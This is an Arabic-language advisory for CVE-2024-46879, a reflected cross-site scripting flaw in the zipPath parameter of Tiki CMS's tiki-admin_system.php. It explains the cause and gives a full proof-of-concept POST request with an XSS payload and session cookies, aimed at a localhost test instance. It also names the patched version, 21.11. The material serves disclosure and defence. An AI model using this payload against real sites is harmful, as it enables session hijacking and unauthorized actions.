
CVE-2024-46879 - ثغرة البرمجة النصية عبر المواقع المنعكسة (XSS) في Tiki CMS
Tiki CMS - ثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة في معامل 'zipPath'
مخصصة فقط للأغراض التعليمية والبحثية والدفاعية. الاستخدام غير المصرح به ضد الأنظمة دون إذن يعتبر غير قانوني.
توجد ثغرة برمجة نصية عبر المواقع (XSS) منعكسة في بيانات طلب POST الخاصة بالمعامل zipPath في ملف tiki-admin_system.php في إصدارات Tiki الأقدم من 21.11. تتيح هذه الثغرة للمهاجمين تنفيذ أكواد JavaScript عشوائية عبر حمولة مصممة بعناية، مما قد يؤدي إلى الوصول إلى معلومات حساسة أو تنفيذ إجراءات غير مصرح بها.
سبب الثغرة هو عدم تعقيم المدخلات بشكل صحيح لمعامل zipPath في ملف tiki-admin_system.php. يُنعكس الإدخال المقدَّم من المستخدم في استجابة HTTP دون ترميز كافٍ، مما يسمح بتنفيذ JavaScript محقون.
تسمح للمهاجم المصادَق بتنفيذ JavaScript عشوائي في متصفح مستخدم آخر عبر طلب مصمم بعناية، مما قد يؤدي إلى اختطاف الجلسة أو تنفيذ إجراءات غير مصرح بها.
POST /tiki-admin_system.php HTTP/1.1
Referer: http://127.0.0.1:9080/
Cookie: wiki_plugin_edit_view=true; tabs=%40tabs_wikipages%3A2%40admin_look%3A2%40admin_general%3A3; show_details=n; preview=%40preview_diff_style%3A; local_tz=Asia%2FCalcutta; javascript_enabled=y; PHPSESSID=120ab2736ae548eda9efcd2c862ac76c; PHPSESSIDCV=JHSjEwiO2tLPDG5yIJ2DQw%3D%3D
Host: 127.0.0.1:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
Accept: */*
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
zipPath=%22'%3E<div%20on<svg/onmouseover="alert(document.domain)">Coldfx</div>"%20/%3E&zip=1

تمت معالجة المشكلة في Tiki CMS Groupware الإصدار 21.11. يُنصح المستخدمون بالترقية إلى هذا الإصدار أو إلى إصدار أحدث يحتوي على التصحيح.
مرجع البائع: https://tiki.org/article515-New-Security-Update-Released-for-Tiki-21-x-LTS-and-Upgrade-is-Strongly-Recommended